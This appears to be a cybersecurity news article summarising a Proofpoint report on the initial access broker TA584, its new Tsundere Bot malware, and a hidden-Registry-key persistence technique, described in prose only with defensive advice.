Hidden in Plain Sight: TA584 Deploys “Tsundere Bot” & Invisible Registry Keys

TA584, a sophisticated Initial Access Broker (IAB) known for paving the way for ransomware gangs, has dramatically escalated its operations in 2025. According to a new report from Proofpoint, the group has not only tripled its monthly campaign volume but also deployed a new, curiously named malware: Tsundere Bot.

The report paints a picture of a threat actor that is constantly evolving, blending “ClickFix” social engineering with highly technical stealth mechanisms to bypass modern defenses.

While TA584 has been on the radar since 2020, 2025 marked a turning point. The group’s operational tempo exploded, with “the number of monthly campaigns tripling from March to December 2025”.

Central to this surge is the introduction of Tsundere Bot, a new malware strain that highlights the group’s shift toward more bespoke tools. This addition suggests that TA584 is moving away from off-the-shelf commodity malware to develop its own arsenal, making detection significantly harder for defenders relying on known signatures.

As the researchers noted, “TA584’s activity is unique in the cybercrime landscape and shows how static detections alone are not reliable for constantly innovating threat actors”.

The most alarming aspect of the report isn’t just the malware itself, but how it hides. TA584 has adopted a clever persistence technique that exploits how Windows displays Registry keys.

By inserting a null terminating string into the Registry entry name, the group makes their malicious autorun key vanish from standard tools. “The entry becomes effectively invisible to basic enumeration, hiding the malicious ‘Run’ key from casual inspection,” the report explains.

This “hidden key establishes an execution chain that triggers every system boot,” launching a sequence that moves from mshta to VBScript, and finally to a hidden PowerShell process.

The group’s sophistication extends to how they maintain control. Instead of storing the full malicious payload on the victim’s disk, the hidden PowerShell script fetches it dynamically from an external IP address every time the computer starts.

This strategy makes the infection modular and incredibly resilient. “The attacker ensures the infection is modular… maintaining a persistent, ‘effectively file-less’ foothold that is difficult to disrupt through standard file-system cleanup”.

Proofpoint assesses with “high confidence” that TA584 is firmly embedded in the Russian cybercriminal ecosystem. The group operates as a specialized broker, cracking open networks to sell access to ransomware affiliates.

“Based on the malware used and artifacts in the attack chains, it is likely this actor is plugged in to the Russian cybercriminal ecosystem and underground markets,” the report confirms.

With global targeting and a rapidly expanding toolkit, TA584 has cemented its status as a top-tier threat. Organizations are urged to look beyond static file detection and monitor for the subtle behavioral anomalies—like hidden PowerShell processes—that reveal this “invisible” intruder.

Related Posts:

• Tsundere Botnet Uncovered: Node.js Malware Uses Ethereum Smart Contract for Unkillable C2 and Runs Cybercrime Marketplace
• GlassWorm Supply Chain Worm Uses Invisible Unicode and Solana Blockchain for Stealth C2
• OpenAI’s Big Ad Gamble: Why ChatGPT Ads Cost 3x More Than Meta With Way Less Data
• Stealthy WordPress Malware Uncovered: SEO Spam Plugin Mimics Your Domain to Evade Detection